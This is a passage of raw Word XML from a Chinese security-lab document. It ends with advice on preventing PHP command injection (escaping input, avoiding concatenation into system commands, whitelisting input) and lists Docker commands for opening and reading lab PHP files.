      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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使用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escapeshellarg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>/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escapeshellcmd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()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>转义输入。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4DFC06" w14:textId="77777777" w:rsidR="00803D08" w:rsidRDefault="009F7E91">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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不直接拼接用户输入到系统命令。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A8DF20" w14:textId="77777777" w:rsidR="00803D08" w:rsidRDefault="009F7E91">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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限制命令执行函数使用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D0D9F2" w14:textId="77777777" w:rsidR="00803D08" w:rsidRDefault="009F7E91">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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使用白名单校验输入格式。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56699ABB" w14:textId="77777777" w:rsidR="00803D08" w:rsidRDefault="00803D08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3F489140" w14:textId="77777777" w:rsidR="00803D08" w:rsidRDefault="009F7E91">
      <w:pPr>
        <w:spacing w:before="380" w:after="140" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="35" w:name="heading_34"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>四、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Docker </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>快速操作命令</w:t>
      </w:r>
      <w:bookmarkEnd w:id="35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03D08" w14:paraId="4AA5BAB4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2E30BA" w14:textId="77777777" w:rsidR="00803D08" w:rsidRDefault="009F7E91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bash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docker exec -it bc23a49cb37c /bin/bash</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>cd /var/www/html/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test_exec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  <w:t xml:space="preserve">cat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testExec.php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  <w:t xml:space="preserve">cat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repairExec.php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br/>
              <w:t>cd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 xml:space="preserve"> ..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/exec</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>cat 01.php</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="350A004A" w14:textId="77777777" w:rsidR="00803D08" w:rsidRDefault="00803D08">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00803D08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87751" w14:textId="77777777" w:rsidR="009F7E91" w:rsidRDefault="009F7E91">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="15E20024" w14:textId="77777777" w:rsidR="009F7E91" w:rsidRDefault="009F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4330C" w14:textId="77777777" w:rsidR="00803D08" w:rsidRDefault="00803D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992C6" w14:textId="77777777" w:rsidR="009F7E91" w:rsidRDefault="009F7E91">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="65CD4722" w14:textId="77777777" w:rsidR="009F7E91" w:rsidRDefault="009F7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02D53" w14:textId="77777777" w:rsidR="00803D08" w:rsidRDefault="00803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61FADE"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="8461FADE"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="4"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:rPr>
        <w:color w:val="3370FF"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="9239341B"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="9239341B"/>
    <w:lvl w:ilvl="0">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:rPr>
        <w:color w:val="3370FF"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="9288B902"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="9288B902"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="2"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:rPr>
        <w:color w:val="3370FF"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="9C8AC8EF"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="9C8AC8EF"/>
    <w:lvl w:ilvl="0">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:rPr>
        <w:color w:val="3370FF"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="B0F1ACD9"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="B0F1ACD9"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="3"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:rPr>
        <w:color w:val="3370FF"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="B5E306ED"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="B5E306ED"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="5"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:rPr>
        <w:color w:val="3370FF"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="BE923771"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="BE923771"/>
    <w:lvl w:ilvl="0">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:rPr>
        <w:color w:val="3370FF"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="BF205925"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="BF205925"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="4"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:rPr>
        <w:color w:val="3370FF"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="C8879AEF"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="C8879AEF"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="3"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:rPr>
        <w:color w:val="3370FF"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="CF092B84"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="CF092B84"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="2"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:rPr>
        <w:color w:val="3370FF"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="10" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="D7F9FE59"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="D7F9FE59"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="8"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:rPr>
        <w:color w:val="3370FF"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="11" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="DCBA6B53"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="DCBA6B53"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="7"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:rPr>
        <w:color w:val="3370FF"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="12" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="F4B5D9F5"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="F4B5D9F5"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="5"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:rPr>
        <w:color w:val="3370FF"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="13" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="0053208E"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="0053208E"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:rPr>
        <w:color w:val="3370FF"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="14" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="0248C179"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="0248C179"/>
    <w:lvl w:ilvl="0">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:rPr>
        <w:color w:val="3370FF"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="15" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="03D62ECE"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="03D62ECE"/>
    <w:lvl w:ilvl="0">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:rPr>
        <w:color w:val="3370FF"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="16" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="0E640482"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="0E640482"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:rPr>
        <w:color w:val="3370FF"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="17" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="2470EC97"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="2470EC97"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="6"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:rPr>
        <w:color w:val="3370FF"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="18" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="25B654F3"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="25B654F3"/>
    <w:lvl w:ilvl="0">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:rPr>
        <w:color w:val="3370FF"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="19" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="2A8F537B"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="2A8F537B"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:rPr>
        <w:color w:val="3370FF"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="20" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="39A0D9AC"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="39A0D9AC"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="3"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:rPr>
        <w:color w:val="3370FF"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="46A08BB8"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="46A08BB8"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="2"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:rPr>
        <w:color w:val="3370FF"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="4C1BAE26"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="4C1BAE26"/>
    <w:lvl w:ilvl="0">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:rPr>
        <w:color w:val="3370FF"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="23" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="4D4DC07F"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="4D4DC07F"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="4"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:rPr>
        <w:color w:val="3370FF"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="24" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="59ADCABA"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="59ADCABA"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="3"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:rPr>
        <w:color w:val="3370FF"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="25" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5A241D34"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="5A241D34"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="2"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:rPr>
        <w:color w:val="3370FF"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="26" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="60382F6E"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="60382F6E"/>
    <w:lvl w:ilvl="0">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:rPr>
        <w:color w:val="3370FF"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="27" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="629F7852"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="629F7852"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:rPr>
        <w:color w:val="3370FF"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="28" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="72183CF9"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="72183CF9"/>
    <w:lvl w:ilvl="0">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:rPr>
        <w:color w:val="3370FF"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="29" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="77ECEA79"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="77ECEA79"/>
    <w:lvl w:ilvl="0">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:rPr>
        <w:color w:val="3370FF"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="30" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="7C246926"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="7C246926"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="4"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:rPr>
        <w:color w:val="3370FF"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="2">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="22">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="23">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="24">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="25">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="26">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="27">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="28">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="29">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="30">
    <w:abstractNumId w:val="2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D08"/>
    <w:rsid w:val="001266F7"/>
    <w:rsid w:val="005003DE"/>
    <w:rsid w:val="00803D08"/>
    <w:rsid w:val="009F7E91"/>
    <w:rsid w:val="431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206C74-F814-4D0F-A131-209FDD05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2026-05-07T02:33:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-07T06:49:00Z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2565C2073B3646EFA6B146E679B89EEA_13</vt:lpwstr>
  </property>
</Properties>
</file>